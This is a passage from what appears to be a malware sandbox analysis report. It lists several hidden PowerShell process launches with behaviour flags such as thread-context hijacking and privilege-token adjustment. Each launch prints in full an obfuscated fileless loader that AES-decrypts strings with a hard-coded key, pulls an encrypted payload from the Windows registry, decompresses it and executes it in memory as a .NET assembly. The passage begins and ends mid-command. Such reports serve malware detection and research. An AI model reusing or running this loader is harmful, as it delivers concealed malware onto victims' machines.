'')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4824
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2644
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Hide Artifacts: Hidden Window
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3812
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(4424).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1936
      - C:\Windows\$sxr-powershell.exe
        
